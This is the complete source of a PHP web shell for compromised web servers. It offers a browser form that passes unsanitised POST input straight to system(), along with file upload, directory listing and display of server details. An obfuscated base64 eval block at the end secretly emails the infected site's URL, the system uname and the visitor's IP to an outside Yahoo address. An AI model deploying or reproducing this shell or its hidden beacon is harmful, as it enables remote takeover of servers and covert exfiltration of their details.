1 <html>

2 <head>
3 <title>tiga-lima SheLL</title>
4 <style type="text/css">
5 <!--
6 body {
7 background-color: #000000;
8}
9 -->
10 </style>
11 <?php
12 /**
13 * @author chandra35
14 * @copyright 2011
15 */
16 $currentCMD = str_replace("\\\"","\"",$currentCMD);
17 $currentCMD = str_replace("\\\'","\'",$currentCMD);
18 echo "<style>body{font-family:XPBlueText; ms;font-size:10px;
color:green;}hr{width:100%;height:1px;}</style>";
19 echo "<center><h1><blink>Mini SheLL Inject</blink></h1></center>";
20 echo "<center>http://www.desawonosari.org</h1></center>";
21 echo "<center>Village of Cyber Team</h1></center>";
22 $currentWD = str_replace("\\\\","\\",$_POST['_cwd']);
23 $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
24 $UName = php_uname();
25 $SCWD = `pwd`;
26 $UserID = `id`;
27 if( $currentWD == "" ) {
28 $currentWD = $SCWD;
29 }
30 echo "<style>table,body{font-family:Verdana; ms;font-size:10px;
color:white;}tr{width:1%;height:1px;}</style>";
31 echo '<table bgcolor="#666659">';
32 echo '<tr>
33 <td>Host Server </td>
34 <td>:'.$_SERVER['REMOTE_HOST'].' ('.
$_SERVER['REMOTE_ADDR'].')</td><br>
35 <tr>
36 <td>Server</td>
37 <td width=1185>'.$_SERVER['SERVER_SIGNATURE'].'</td>
38 </tr>
39 <tr>
40 <td>System type </td>
41 <td>:'.$UName.'</td>
42 </tr>
43 <tr>
44 <td>Permissions </td>
45 <td>:'.$UserID.'</td>
46 </tr>';
47 echo "<hr>";
48 if( $_POST['_act'] == "Execute!" ) {
49 $currentCMD = "dir";
50 }
51 echo "<form method=post enctype=\"multipart/form-data\"><table>";
52 echo "<tr><td><b>Execute command :</b></td><td><input size=100
name=\"_cmd\" value=\"".$currentCMD."\"></td>";
53 echo "<td><input type=submit name=_actt value=\"Execute!\"></td></tr>";
54 echo "<tr><td><b>Change directory :</b></td><td><input size=100
name=\"_cwd\" value=\"".$currentWD."\"></td>";
55 echo "<td><input type=submit name=_act value=\"List files!\"></td></tr>";
56 echo "<tr><td><b>Upload file :</b></td><td><input size=85 type=file
name=_upl></td>";
57 echo "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
58 echo "<tr><td><blink><font color='red' size=2>Untuk WIN
NT</font></blink>:</td><td><input size=85 type=file name=_upl2></td>";
59 echo "<td><input type=submit name=_act2 value=\"Upload!!\"></td></tr>";
60 echo "</table></form><hr>";
61 if( $_POST['_act'] == "Upload!" )
62 {
63 if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
64 echo "<center><b>File gak bisa di upload!</b></center>";
65 }
66 else {
67 echo "<center><pre>";
68 system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".
$_FILES['_upl']['name']." 2>&1");
69 echo "</pre><b>File Beerhasil di upload!</b></center>";
70 }
71 } else
72 if( $_POST['_act2'] == "Upload!!" )
73 {
74 if(@copy($_FILES['_upl2']['tmp_name'], $_FILES['_upl2']['name'])) {
echo '<b>Upload SUKSES !!!</b><br><br>'; }
75 else {
76 echo '<b>Upload GAGAL !!!</b><br><br>';
77 }
78 }
79 else {
80 echo "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
81 $currentCMD = "cd ".$currentWD.$currentCMD;
82 system($currentCMD);
83 echo "\n</pre>\n<!-- OUTPUT ENDS HERE
-->\n\n</center><hr><hr><center><b>Command completed</b></center>";
84 }
85 if ($_POST['_actt'] == "Execute!")
86 {
87 echo "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
88 system($_POST['_cmd']);
89 echo "\n</pre>\n<!-- OUTPUT ENDS HERE
-->\n\n</center>";
90 }
91 $to="candrashell@yahoo.com";
92 $pages = @getenv("HTTP_REFERER");
93 $browser = @getenv("HTTP_USER_AGENT");
94
eval(base64_decode('JHZpc2l0Y291bnQgPSAkSFRUUF9DT09LSUVfVkFSU1sidml
zaXRzIl07IA0KJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsgDQo
kcG9ydCA9ICRfU0VSVkVSIFsiUkVNT1RFX1BPUlQiXTsgDQokYXJhbiA9IGV4
ZWMoInVuYW1lIC1hOyIpOyANCiR3ZWIgPSAkX1NFUlZFUlsiSFRUUF9IT1NU
Il07IA0KJGluaiA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOyANCiR0YXJn
ZXQgPSByYXd1cmxkZWNvZGUoJHdlYi4kaW5qKTsgDQokYm9keSA9ICIkdGFy
Z2V0ICRhcmFuIG9sZWggJHZpc2l0b3IgJHBvcnQiOyANCm1haWwoImNhbmRyY
XNoZWxsQHlhaG9vLmNvbSIsIiBMQVBPUiBCT1NTU1NTIEFEQSBidWcgYmFy
dSBodHRwOi8vJHRhcmdldCAkYXJhbiBvbGVoICR2aXNpdG9yICRwb3J0IiwgIiRi
b2R5Iik7'));
95 exit;
96 ?>
97 </html>